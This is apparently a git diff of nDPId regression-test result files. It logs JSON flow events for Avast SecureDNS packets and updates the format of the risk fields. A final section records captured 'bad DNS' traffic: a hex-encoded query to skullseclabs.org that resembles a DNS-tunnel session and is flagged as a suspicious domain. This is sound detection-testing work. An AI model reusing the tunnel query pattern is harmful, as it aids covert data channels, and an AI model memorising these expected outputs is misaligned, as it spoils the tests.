 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1625556067553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625556067553,"pkt":"YDjgxTWgeJS0JASgCABFAADMazAAADIRgHm11iOVwKgCZAG7yLcAuCAQZCmBgAABAAEAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1625556100118,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625556100118,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwQAAH8RhC7AqAJktdYjlfy8AbsAL4gY7+wBAAABAAAAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1625556100236,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625556100236,"pkt":"YDjgxTWgeJS0JASgCABFAADMlbkAADIRVfC11iOVwKgCZAG7\/LwAuACH7+yBgAABAAEAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1625556102196,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625556102196,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwgAAH8RhCrAqAJktdYjldUVAbsAL6kdFo8BAAABAAAAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1625556102314,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625556102314,"pkt":"YDjgxTWgeJS0JASgCABFAADMmGEAADMRUki11iOVwKgCZAG71RUAuCGMFo+BgAABAAEAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556067432,"flow_last_seen":1625556067553,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556100118,"flow_last_seen":1625556100236,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625556102196,"flow_last_seen":1625556102314,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1625558730271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625558730271,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFIAAH8RcuDAqAJktdYjldXoAbsALw4O0KsBAAABAAAAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1625558730389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625558730389,"pkt":"YDjgxTWgeJS0JASgCABFAADM7EMAADIR\/2W11iOVwKgCZAG71egAuIZ80KuBgAABAAEAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1625558735043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625558735043,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFYAAH8RctzAqAJktdYjlcAAAbsAL9\/2VKsBAAABAAAAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1625558735164,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625558735164,"pkt":"YDjgxTWgeJS0JASgCABFAADM7yMAADIR\/IW11iOVwKgCZAG7wAAAuFhlVKuBgAABAAEAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558735043,"flow_last_seen":1625558735164,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625558730271,"flow_last_seen":1625558730389,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625558735164,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00167{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"avast_securedns.pcapng","alias":"nDPId-test","total-events-serialized":198}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 77/77
@@ -204,10 +204,10 @@
 ~~ total active/idle flows...: 39/39
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4642662 bytes
-~~ total memory freed........: 4642662 bytes
-~~ total allocations/frees...: 99744/99744
+~~ total memory allocated....: 4715151 bytes
+~~ total memory freed........: 4715151 bytes
+~~ total allocations/frees...: 101334/101334
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 172 chars
-~~ json string max len.......: 728 chars
-~~ json string avg len.......: 520 chars
+~~ json string max len.......: 837 chars
+~~ json string avg len.......: 574 chars
diff --git a/test/results/bad-dns-traffic.pcap.out b/test/results/bad-dns-traffic.pcap.out
index d20dd1292..3813b9f51 100644
--- a/test/results/bad-dns-traffic.pcap.out
+++ b/test/results/bad-dns-traffic.pcap.out
@@ -1,32 +1,32 @@
 00447{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1486012623234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"ts_msec":1486012623234,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3821AAEARVP\/AqCtbBAICBIx+ADUAYyoIa68BAAABAAAAAAAAODA1ZTEwMGE2MjFjMzYyMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="}
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012623234,"flow_last_seen":1486012623234,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1486012623234,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"05e100a621c3620001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
